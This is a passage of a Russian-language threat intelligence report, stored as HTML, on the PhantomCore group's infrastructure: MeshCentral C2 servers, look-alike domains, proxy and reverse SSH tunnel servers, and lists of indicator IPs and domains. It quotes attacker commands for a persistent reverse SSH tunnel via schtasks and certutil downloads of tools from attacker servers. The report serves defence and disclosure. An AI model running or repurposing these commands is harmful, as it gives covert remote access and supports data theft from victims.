\u0438\u00a0\u0436\u0435\u0440\u0442\u0432\u0430\u0445, \u0430\u00a0\u0442\u0430\u043a\u0436\u0435 \u043f\u043e\u0441\u0442\u0430\u0432\u0438\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435 \u043a\u0438\u0431\u0435\u0440\u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438 \u0432\u00a0\u043f\u0440\u043e\u0434\u0443\u043a\u0442\u044b Positive Technologies.<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/fc6\/958\/59f\/fc695859f9440454fbeccd118a665315.png\" alt=\"\u0414\u0430\u043d\u043d\u044b\u0435 \u043a\u0438\u0431\u0435\u0440\u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438 \u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u0441 \u043f\u0430\u043d\u0435\u043b\u044c\u044e \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f Phantom \u043d\u0430 PT Threat Intelligence Portal  \" title=\"\u0414\u0430\u043d\u043d\u044b\u0435 \u043a\u0438\u0431\u0435\u0440\u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438 \u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u0441 \u043f\u0430\u043d\u0435\u043b\u044c\u044e \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f Phantom \u043d\u0430 PT Threat Intelligence Portal  \" width=\"1427\" height=\"555\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/fc6\/958\/59f\/fc695859f9440454fbeccd118a665315.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/fc6\/958\/59f\/fc695859f9440454fbeccd118a665315.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0414\u0430\u043d\u043d\u044b\u0435 \u043a\u0438\u0431\u0435\u0440\u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438 \u043e\u00a0\u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u0441\u00a0\u043f\u0430\u043d\u0435\u043b\u044c\u044e \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f Phantom \u043d\u0430\u00a0PT Threat Intelligence Portal <\/figcaption><\/div>\n<\/figure>\n<\/li>\n<li>\n<p>C2-\u0441\u0435\u0440\u0432\u0435\u0440\u044b MeshAgent<\/p>\n<p>VPS\u2011\u0441\u0435\u0440\u0432\u0435\u0440\u044b \u043f\u043e\u0434\u00a0\u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b Ubuntu \u0441\u00a0\u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u043e\u0439 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u043c\u0438 MeshCentral, \u043e\u00a0\u0447\u0435\u043c \u0433\u043e\u0432\u043e\u0440\u044f\u0442 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0435 TLS\u2011\u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u044b \u043d\u0430\u00a0\u043e\u0442\u043a\u0440\u044b\u0442\u043e\u043c 443\u00a0(HTTPS) \u0441\u0435\u0442\u0435\u0432\u043e\u043c \u043f\u043e\u0440\u0442\u0435.<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/4ad\/22d\/817\/4ad22d81702f96a0d9c8dc175e15427c.png\" alt=\"\u0421\u0435\u0442\u0435\u0432\u043e\u0439 \u043f\u0440\u043e\u0444\u0438\u043b\u044c MeshCentral-\u0441\u0435\u0440\u0432\u0435\u0440\u0430 c TLS-\u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u043c \u0434\u043b\u044f austolns[.]pw\" title=\"\u0421\u0435\u0442\u0435\u0432\u043e\u0439 \u043f\u0440\u043e\u0444\u0438\u043b\u044c MeshCentral-\u0441\u0435\u0440\u0432\u0435\u0440\u0430 c TLS-\u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u043c \u0434\u043b\u044f austolns[.]pw\" width=\"880\" height=\"185\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/4ad\/22d\/817\/4ad22d81702f96a0d9c8dc175e15427c.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/4ad\/22d\/817\/4ad22d81702f96a0d9c8dc175e15427c.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0421\u0435\u0442\u0435\u0432\u043e\u0439 \u043f\u0440\u043e\u0444\u0438\u043b\u044c MeshCentral\u2011\u0441\u0435\u0440\u0432\u0435\u0440\u0430 c TLS\u2011\u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u043c \u0434\u043b\u044f\u00a0austolns[.]pw<\/figcaption><\/div>\n<\/figure>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/d70\/9ae\/ef2\/d709aeef25ad03bd64bcd833e282cadd.png\" alt=\"TLS-\u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442 MeshCentral-\u0441\u0435\u0440\u0432\u0435\u0440\u0430 c \u0434\u043e\u043c\u0435\u043d\u043e\u043c austolns[.]pw\" title=\"TLS-\u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442 MeshCentral-\u0441\u0435\u0440\u0432\u0435\u0440\u0430 c \u0434\u043e\u043c\u0435\u043d\u043e\u043c austolns[.]pw\" width=\"1856\" height=\"914\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/d70\/9ae\/ef2\/d709aeef25ad03bd64bcd833e282cadd.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/d70\/9ae\/ef2\/d709aeef25ad03bd64bcd833e282cadd.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>TLS\u2011\u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442 MeshCentral\u2011\u0441\u0435\u0440\u0432\u0435\u0440\u0430 c \u0434\u043e\u043c\u0435\u043d\u043e\u043c austolns[.]pw<\/figcaption><\/div>\n<\/figure>\n<p>\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u043d\u0430\u00a0\u0441\u0442\u0430\u0434\u0438\u0438 \u0437\u0430\u043a\u0440\u0435\u043f\u043b\u0435\u043d\u0438\u044f (Persistence) \u0434\u043b\u044f\u00a0\u043f\u0435\u0440\u0435\u0434\u0430\u0447\u0438 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043e\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u044b\u0445 \u0445\u043e\u0441\u0442\u0430\u0445 \u0438 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0438\u043c\u0438 \u0447\u0435\u0440\u0435\u0437 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u044b MeshAgent, \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u043c\u044b\u0435 \u043e\u043f\u0435\u0440\u0430\u0442\u043e\u0440\u0430\u043c\u0438 PhantomRAT \u0438 PhantomRShell \u0441\u043e \u0432\u0437\u043b\u043e\u043c\u0430\u043d\u043d\u043e\u0433\u043e\u00a0\u043b\u0438\u0431\u043e \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u043e\u0433\u043e \u0441\u0430\u0439\u0442\u043e\u0432.<\/p>\n<p>\u0412\u00a0\u043e\u0442\u043d\u043e\u0448\u0435\u043d\u0438\u0438 MeshCentral\u2011\u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 PhantomCore \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u0435\u0442 \u0446\u0435\u043b\u044b\u0439 \u043a\u043e\u043c\u043f\u043b\u0435\u043a\u0441 \u043c\u0435\u0440 \u043a\u043e\u043d\u0441\u043f\u0438\u0440\u0430\u0446\u0438\u0438, \u043c\u0430\u0441\u043a\u0438\u0440\u0443\u044f \u0438\u0445 \u043f\u043e\u0434\u00a0\u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u0443\u044e IT\u2011\u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443:<\/p>\n<ul>\n<li>\n<p>\u041c\u0438\u043c\u0438\u043a\u0440\u0438\u044f \u0432\u0435\u0431\u2011\u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441\u043e\u0432 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u043f\u043e\u0434\u00a0\u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0435 Mattermost\u2011 \u0438 Nextcloud\u2011\u0441\u0435\u0440\u0432\u0438\u0441\u044b<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/8a3\/eec\/8c0\/8a3eec8c00e692bc3425370fdcc37df0.png\" alt=\"\u041c\u0438\u043c\u0438\u043a\u0440\u0438\u044f \u0432\u0435\u0431-\u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441\u0430 MeshCentral \u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u043f\u043e\u0434 Mattermost\" title=\"\u041c\u0438\u043c\u0438\u043a\u0440\u0438\u044f \u0432\u0435\u0431-\u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441\u0430 MeshCentral \u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u043f\u043e\u0434 Mattermost\" width=\"1280\" height=\"646\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/8a3\/eec\/8c0\/8a3eec8c00e692bc3425370fdcc37df0.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/8a3\/eec\/8c0\/8a3eec8c00e692bc3425370fdcc37df0.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u041c\u0438\u043c\u0438\u043a\u0440\u0438\u044f \u0432\u0435\u0431\u2011\u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441\u0430 MeshCentral \u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u043f\u043e\u0434\u00a0Mattermost<\/figcaption><\/div>\n<\/figure>\n<\/li>\n<li>\n<p>IT\u2011\u043c\u0438\u043c\u0438\u043a\u0440\u0438\u044f \u0434\u043e\u043c\u0435\u043d\u043d\u044b\u0445 \u0438\u043c\u0435\u043d MeshCentral\u2011\u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432<\/p>\n<p>\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0435 \u0433\u0440\u0443\u043f\u043f\u043e\u0439 \u043a\u0438\u0431\u0435\u0440\u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438 MeshCentral\u2011\u0441\u0435\u0440\u0432\u0435\u0440\u044b \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0434\u043e\u043c\u0435\u043d\u044b \u0441\u00a0\u0442\u0435\u043c\u0430\u0442\u0438\u043a\u043e\u0439 \u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0438 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u043a\u0438 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f:<\/p>\n<p><code>nextcloud.soft-trust.com<br \/>nextcloud.1cbit.dev<br \/>nextcloud.trust-sec.it.com<br \/>softline-solutions.cloud<\/code><\/p>\n<p>\u0420\u044f\u0434 \u0434\u043e\u043c\u0435\u043d\u043e\u0432\u00a0\u0431\u044b\u043b \u0437\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u044b \u0441\u00a0\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u0433\u0440\u0430\u0436\u0434\u0430\u043d\u0438\u043d\u0430 \u0420\u043e\u0441\u0441\u0438\u0438 \u0438 \u0430\u0434\u0440\u0435\u0441\u0430 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043f\u043e\u0447\u0442\u044b emilygrace1981@proton[.]me, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u043e\u0433\u043e \u0441\u00a0\u0438\u043d\u044b\u043c\u0438 \u0434\u043e\u043c\u0435\u043d\u0430\u043c\u0438 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 PhantomCore c IT\u2011\u043c\u0438\u043c\u0438\u043a\u0440\u0438\u0435\u0439:<\/p>\n<p><code>polylab.top<br \/>techinnovators.world<br \/>blockchaineech.world<br \/>agrotech.homes<br \/>miucroprocessors.world<br \/>cybersedcurity.world<br \/>reconfiguratifon.world<br \/>telecommuunication.world<br \/>interoperaebility.world<\/code><\/p>\n<\/li>\n<li>\n<p>\u041c\u0438\u043c\u0438\u043a\u0440\u0438\u044f \u043f\u043e\u0434\u00a0\u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0435 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0435 IT\u2011\u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438<\/p>\n<p>\u041d\u0430 81\u00a0(HTTP) \u0441\u0435\u0442\u0435\u0432\u043e\u043c \u043f\u043e\u0440\u0442\u0435 MeshCentral\u2011\u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0438\u0440\u0443\u0435\u0442 \u043b\u044d\u043d\u0434\u0438\u043d\u0433 \u0441\u00a0HTML\u2011\u0440\u0430\u0437\u043c\u0435\u0442\u043a\u043e\u0439, \u0441\u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0439 \u0441\u00a0\u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0445 \u0441\u0430\u0439\u0442\u043e\u0432 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0445 IT\u2011\u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0439.<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/cd3\/097\/cb6\/cd3097cb6b0aab347d3e879b73938cb2.png\" alt=\"\u041c\u0438\u043c\u0438\u043a\u0440\u0438\u044f \u043f\u043e\u0434 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0439 IT-\u0438\u043d\u0442\u0435\u0433\u0440\u0430\u0442\u043e\u0440\" title=\"\u041c\u0438\u043c\u0438\u043a\u0440\u0438\u044f \u043f\u043e\u0434 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0439 IT-\u0438\u043d\u0442\u0435\u0433\u0440\u0430\u0442\u043e\u0440\" width=\"1200\" height=\"600\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/cd3\/097\/cb6\/cd3097cb6b0aab347d3e879b73938cb2.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/cd3\/097\/cb6\/cd3097cb6b0aab347d3e879b73938cb2.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u041c\u0438\u043c\u0438\u043a\u0440\u0438\u044f \u043f\u043e\u0434\u00a0\u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0439 IT\u2011\u0438\u043d\u0442\u0435\u0433\u0440\u0430\u0442\u043e\u0440<\/figcaption><\/div>\n<\/figure>\n<p>\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0435 MeshCentral \u0434\u043e\u043c\u0435\u043d\u044b \u0438 \u0441\u0435\u0440\u0432\u0435\u0440\u044b:<\/p>\n<p><code>austolns.pw<br \/>nextcloud.soft-trust.com<br \/>nextcloud.1cbit.dev<br \/>nextcloud.trust-sec.it.com<br \/>softline-solutions.cloud<\/code><\/p>\n<p><code>194.87.253.233<br \/> 213.232.204.110<br \/> 194.116.215.36<br \/> 46.8.71.104<br \/> 217.19.4.206<br \/> 91.239.148.211<\/code><\/p>\n<\/li>\n<\/ul>\n<\/li>\n<li>\n<p>\u041f\u0440\u043e\u043a\u0441\u0438\u2011\u0441\u0435\u0440\u0432\u0435\u0440\u044b PhantomProxyLite, RSocx, SSH\u2011\u0442\u0443\u043d\u043d\u0435\u043b\u0435\u0439<\/p>\n<p>VPS\u2011\u0441\u0435\u0440\u0432\u0435\u0440\u044b \u043f\u043e\u0434\u00a0\u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b Ubuntu \u0441\u00a0\u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c\u0438 80\u00a0(HTTP), 443\u00a0(HTTPS) \u0438 8080\u00a0(HTTP) \u0441\u0435\u0442\u0435\u0432\u044b\u043c\u0438 \u043f\u043e\u0440\u0442\u0430\u043c\u0438, \u043d\u0430\u00a0\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0437\u0430\u043f\u0443\u0449\u0435\u043d\u0430 SSH\u2011\u0441\u043b\u0443\u0436\u0431\u0430. \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u043d\u0430\u00a0\u0441\u0442\u0430\u0434\u0438\u044f\u0445 \u0437\u0430\u043a\u0440\u0435\u043f\u043b\u0435\u043d\u0438\u044f (Persistence), \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0449\u0435\u043d\u0438\u044f \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f (Defense Evasion) \u0438 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f (Command and Control) \u0434\u043b\u044f\u00a0\u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u043e\u0431\u0440\u0430\u0442\u043d\u043e\u0433\u043e SSH\u2011\u0442\u0443\u043d\u043d\u0435\u043b\u044f \u0434\u043e\u00a0\u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0435\u0439 \u0441\u0435\u0442\u0438\u00a0\u0436\u0435\u0440\u0442\u0432\u044b, \u0437\u0430\u043c\u0430\u0441\u043a\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u043f\u043e\u0434\u00a0\u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u044b\u0439 HTTPS\u2011\u0442\u0440\u0430\u0444\u0438\u043a.<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/397\/db1\/8bf\/397db18bf35ef4a0e9a897ff30aa6b84.png\" alt=\"\u0421\u0435\u0442\u0435\u0432\u043e\u0439 \u043f\u0440\u043e\u0444\u0438\u043b\u044c \u043f\u0440\u043e\u043a\u0441\u0438-\u0441\u0435\u0440\u0432\u0435\u0440\u0430\" title=\"\u0421\u0435\u0442\u0435\u0432\u043e\u0439 \u043f\u0440\u043e\u0444\u0438\u043b\u044c \u043f\u0440\u043e\u043a\u0441\u0438-\u0441\u0435\u0440\u0432\u0435\u0440\u0430\" width=\"1010\" height=\"287\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/397\/db1\/8bf\/397db18bf35ef4a0e9a897ff30aa6b84.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/397\/db1\/8bf\/397db18bf35ef4a0e9a897ff30aa6b84.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0421\u0435\u0442\u0435\u0432\u043e\u0439 \u043f\u0440\u043e\u0444\u0438\u043b\u044c \u043f\u0440\u043e\u043a\u0441\u0438\u2011\u0441\u0435\u0440\u0432\u0435\u0440\u0430<\/figcaption><\/div>\n<\/figure>\n<p>\u041a\u043e\u043c\u0430\u043d\u0434\u044b \u043d\u0430\u00a0\u0437\u0430\u043f\u0443\u0441\u043a SSH\u2011\u0442\u0443\u043d\u043d\u0435\u043b\u044f, \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0435 \u043d\u0430\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u044b\u0445 \u0445\u043e\u0441\u0442\u0430\u0445 \u0441\u00a0\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0431\u044d\u043a\u0434\u043e\u0440\u0430 PhantomTaskShell \u0438 \u043f\u043b\u0430\u043d\u0438\u0440\u043e\u0432\u0449\u0438\u043a\u0430 \u0437\u0430\u0434\u0430\u0447 Windows:<\/p>\n<p><code>ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 -f -N -R 37581 -p 443 cfyvg84df17842o@185.130.251.227<\/code><\/p>\n<p><code>schtasks \/create \/sc DAILY \/tn SSH \/tr \\\"C:\\Windows\\system32\\OpenSSH\\ssh.exe -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 -f -N -R 52213 -p 443 cfyvg84df17842o@185.130.251.227\\\" \/f \/st 09:00<\/code><\/p>\n<p>\u0423\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 SSH\u2011\u0441\u0435\u0441\u0441\u0438\u044f\u043c\u0438 \u043d\u0430\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u044b\u0445 \u0445\u043e\u0441\u0442\u0430\u0445 \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0447\u0435\u0440\u0435\u0437 \u043f\u0430\u043d\u0435\u043b\u044c \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f, \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0438\u0440\u0443\u044e\u0449\u0443\u044e \u043d\u0430 80\u00a0(HTTP) \u0441\u0435\u0442\u0435\u0432\u043e\u043c \u043f\u043e\u0440\u0442\u0435 \u0442\u0443\u043d\u043d\u0435\u043b\u0438\u0440\u0443\u044e\u0449\u0438\u0445 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432.<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/5f5\/a33\/2e3\/5f5a332e3bc1450ed80f6e741e4056ef.png\" alt=\"\u041f\u0430\u043d\u0435\u043b\u044c \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u0441 SSH-\u0442\u0443\u043d\u043d\u0435\u043b\u0435\u043c\" title=\"\u041f\u0430\u043d\u0435\u043b\u044c \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u0441 SSH-\u0442\u0443\u043d\u043d\u0435\u043b\u0435\u043c\" width=\"3840\" height=\"2147\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/5f5\/a33\/2e3\/5f5a332e3bc1450ed80f6e741e4056ef.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/5f5\/a33\/2e3\/5f5a332e3bc1450ed80f6e741e4056ef.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u041f\u0430\u043d\u0435\u043b\u044c \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043d\u0430\u00a0\u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u0441\u00a0SSH\u2011\u0442\u0443\u043d\u043d\u0435\u043b\u0435\u043c<\/figcaption><\/div>\n<\/figure>\n<p>\u041f\u0440\u043e\u043a\u0441\u0438\u2011\u0441\u0435\u0440\u0432\u0435\u0440\u044b \u0442\u0430\u043a\u0436\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u043d\u0430\u00a0\u0441\u0442\u0430\u0434\u0438\u044f\u0445 \u0441\u0431\u043e\u0440\u0430 (Collection) \u0438 \u044d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u0438 (Exfiltration) \u0434\u0430\u043d\u043d\u044b\u0445, \u0432\u044b\u0441\u0442\u0443\u043f\u0430\u044f \u0432\u00a0\u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0445\u0430\u0431\u0430 \u0434\u043b\u044f\u00a0\u0443\u0442\u0438\u043b\u0438\u0442\u044b RClone \u0438 \u0444\u0430\u0439\u043b\u0430 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438, \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u043c\u044b\u0445 \u043d\u0430\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u044b\u0435 \u0445\u043e\u0441\u0442\u044b \u0441 8080\u00a0(HTTP) \u0441\u0435\u0442\u0435\u0432\u043e\u0433\u043e \u043f\u043e\u0440\u0442\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u043a\u043e\u043c\u0430\u043d\u0434\u0430\u043c\u0438:<\/p>\n<p><code>certutil.exe -urlcache -f \"http:\/\/195.133.32.213:8000\/srvhost.exe\" \"C:\\ProgramData\\srvhost.exe\"<\/code><\/p>\n<p><code>certutil.exe -urlcache -f http:\/\/195.133.32.213:8000\/wusa.conf C:\\ProgramData\\wusa.conf<\/code><\/p>\n<p>\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0435 \u0441\u0435\u0440\u0432\u0435\u0440\u044b:<\/p>\n<p><code>193.187.174.251<br \/>185.130.251.227<br \/>195.133.32.213<br \/>193.187.174.3<br \/>194.116.215.166<br \/>185.130.251.219<br \/>88.66.89.231<br \/>91.219.151.103<br \/>91.219.151.59<br \/>45.8.228.253<br \/>45.158.169.131<\/code><\/p>\n<\/li>\n<li>\n<p>\u0410\u0433\u0440\u0435\u0433\u0430\u0442\u043e\u0440\u044b \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043e\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u044b\u0445 \u0445\u043e\u0441\u0442\u0430\u0445<\/p>\n<p>VPS\u2011\u0441\u0435\u0440\u0432\u0435\u0440\u044b \u043f\u043e\u0434\u00a0\u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b Ubuntu \u0441 80\u00a0(HTTP) \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c \u0441\u0435\u0442\u0435\u0432\u044b\u043c \u043f\u043e\u0440\u0442\u043e\u043c, \u043d\u0430\u00a0\u043a\u043e\u0442\u043e\u0440\u043e\u043c \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0438\u0440\u0443\u0435\u0442 \u0431\u044d\u043a\u0435\u043d\u0434 